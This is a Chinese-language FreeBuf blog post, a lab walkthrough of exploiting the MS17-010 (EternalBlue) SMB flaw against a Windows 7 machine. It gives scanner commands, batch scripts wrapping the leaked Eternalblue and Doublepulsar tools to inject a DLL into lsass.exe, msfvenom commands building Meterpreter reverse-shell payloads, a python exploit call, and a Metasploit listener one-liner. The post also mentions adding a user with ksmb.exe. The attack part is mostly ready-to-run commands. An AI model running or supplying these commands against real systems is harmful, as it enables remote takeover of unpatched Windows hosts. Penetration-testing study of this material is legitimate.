freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

域渗透之ms17010的多种打法
  • 关注
域渗透之ms17010的多种打法
2023-01-03 16:39:13
所属地 北京


浅谈MS17010多种利用

●本文主要介绍NSA原版MS17-010利用
●metasploit 利用网上太多了,这里就不介绍了

漏洞介绍

漏洞名称:永恒之蓝
漏洞编号:MS17-010,CVE-2017-0143/0144/0145/0146/0147/0148
漏洞类型:缓冲区溢出漏洞
漏洞影响:Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; Windows Server 2016

实验环境


kali
●ip:192.168.0.18

win7
●ip:192.168.0.28

1672734364_63b3e69cabedda073bbac.png!small?1672734365517

1672734376_63b3e6a82a8e59abb3c5a.png!small?1672734376674

1672734386_63b3e6b28c7946e0de693.png!small?1672734386962

1672734417_63b3e6d118d760b1f34a7.png!small?1672734417580



MS17010检查

checker.py

GitHub:https://github.com/worawit/MS17-010

python2 checker.py 192.168.0.28

1672734446_63b3e6eeb44fb0c68844f.png!small?1672734447153

check.bat
GitHub:https://github.com/3gstudent/Smbtouch-Scanner
新建check.bat

check.bat


@Smbtouch-1.1.1.exe --TargetIp %1 --OutConfig 1.txt

check.bat 192.168.0.28

1672734526_63b3e73e009d8d2e2c6b1.png!small?1672734527267


Ladon

Ladon.exe 192.168.0.28 MS17010

1672734562_63b3e7626c112bab5d51f.png!small?1672734562906


fscan

fscan -h 192.168.0.28

1672734589_63b3e77d80b345b2453c5.png!small?1672734590795


总之方法有很多,选择自己喜欢的


MS17010利用

有防火墙

参考:

本人没成功,终究还是太菜了

【MS17010打法】 https://www.bilibili.com/video/BV1Ye4y1k7X9/?share_source=copy_web&vd_source=2eb72ea5238fe3398c820713b04697ff

无防火墙

环境和上面不一样,但是不影响

Github:

  1. https://github.com/x0rz/EQGRP_Lost_in_Translation


  2. 将工具包中以下三个目录中的文件拷贝到同一个目录中(因为64位系统是支持32位的,所以直接复制32位的就好):

    windows\lib\x86-Windows\

    windows\specials\

    windows\payloads\

    然后在目录中,把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml,Doublepulsar-1.3.1.0.xml改为Doublepulsar-1.3.1.xml


    为了方便使用,编写bat脚本

    attack.bat 192.168.0.28 

    @echo off
    echo =============== [ TargetIp: %1 ] ===============
    Eternalblue-2.2.0.exe --InConfig Eternalblue-2.2.0.xml --TargetIp %1 --TargetPort 445 --Target WIN72K8R2

    backdoor.bat 192.168.0.28 exp.dll

    @echo off
echo ================================================
echo [info] TargetIp: %1
echo [info] Architecture: %2
echo [info] DllPayload: %3
echo ================================================
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60
    1. https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit

    deps文件夹,在目录中,把Eternalblue-2.2.0.0.xml文件重命名成Eternalblue-2.2.0.xml,Doublepulsar-1.3.1.0.xml改为Doublepulsar-1.3.1.xml

    1672734796_63b3e84c958636eb17a1e.png!small?1672734797038


    编写bat脚本,使用方法和上面一样

    attack.bat

    @echo off
echo =============== [ TargetIp: %1 ] ===============
Eternalblue-2.2.0.exe --TargetIp %1 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig outlog.txt

    backdoor.bat

    @echo off
echo ================================================
echo [info] TargetIp: %1
echo [info] Architecture: %2
echo [info] DllPayload: %3
echo ================================================
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp %1 --TargetPort 445 --Protocol SMB --Architecture %2 --Function RunDLL --DllPayload %3 --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60

MS07010的利用方式


利用一


NSA原版MS17-010

记得metasploit开启监听

#metasploit生成dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx64.dll    
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx86.dll


1.检查MS17010

1672734880_63b3e8a0d4771276fdcc2.png!small?1672734881597


2.攻击

1672734903_63b3e8b7143c6b3975620.png!small?1672734903666

1672735400_63b3eaa8117d636f2b5f3.png!small?1672735401137

3.漏洞利用

1672735422_63b3eabe27f1940cff9e2.png!small?1672735422672

1672735436_63b3eacc25cf13a425e77.png!small?1672735437079


metasploit上线

1672735012_63b3e924d83b79395a7f6.png!small?1672735013713


利用二

K8哥哥的ksmb.exe

1672735032_63b3e93896100f7993873.png!small?1672735033059


成功添加用户

1672735051_63b3e94b75abe8a0f1a88.png!small?1672735051819


利用三

https://blackwolfsec.cc/2017/05/12/Eternalblue_ms17-010/

需要多次利用才能成功

#生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.18 LPORT=1111 -f raw > shellcode

#利用
python3 ms17-010.py --host 192.168.0.28 --file shellcode


加上--port 445会报错

1.攻击

1672735088_63b3e970ee0f7268424b6.png!small?1672735090123


2.监听后成功上线

#一键启动监听
msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.0.18; set lport 1111; exploit - j; "

1672735115_63b3e98bb0eebcc64ffaf.png!small?1672735116134


# 渗透测试 # 网络安全 # 系统安全 # 数据安全 # 内网渗透
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录
MS17010检查
  • checker.py
  • Ladon
  • fscan
MS17010利用
  • 有防火墙
  • 无防火墙